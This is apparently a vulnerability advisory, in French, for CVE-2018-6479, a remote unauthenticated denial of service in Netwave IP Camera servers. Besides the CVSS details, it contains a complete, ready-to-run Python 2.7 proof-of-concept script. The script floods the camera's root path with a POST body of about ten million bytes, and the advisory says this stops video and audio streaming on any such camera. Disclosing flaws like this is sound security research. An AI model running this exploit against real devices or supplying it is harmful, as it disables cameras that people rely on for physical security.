
[CVE-2018-6479] Serveur Netwave IP Camera vulnérable à un déni de service via une seule énorme requête POST.
| CVE | Description |
|---|---|
| CVE-2018-6479 | Vulnérabilité de déni de service distant non authentifié |
| CVSS | Score | Détails |
|---|---|---|
| 3 | 7.3 | CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:X/RL:W/RC:X |
Lors d'une recherche en sécurité IoT, des vulnérabilités ont été découvertes sur différents vendeurs de caméras IP. Netwave IP Camera est un serveur de caméra IP qui permet de voir la vidéo de la caméra et d'administrer la caméra. Les caméras IP sont utilisées surtout pour la sécurité physique et le contrôle, donc leur disponibilité est cruciale.
N'importe quelle caméra IP Netwave peut être mise hors service en envoyant simplement une requête POST volumineuse à son chemin racine. Une fois la requête envoyée, l'appareil se bloque et cesse de diffuser l'audio et la vidéo.
Preuve de concept : Exécutez le script Python 2.7 suivant contre n'importe quelle caméra IP NetWave, elle cessera de répondre et de diffuser la vidéo/l'audio instantanément.
import string
import httplib
import urllib2
host = "CAMERA_IP"
port = 80
params='A'*9999999 # Huge body
headers = {
"Host": host + ':' + str(port),
"Connection": "keep-alive",
"Content-Length": 9999999,
}
url = "/"
conn = httplib.HTTPConnection(host,port=port)
conn.request("POST",url,params,headers)
response = conn.getresponse()
data = response.read()
print data
Gonzalo García León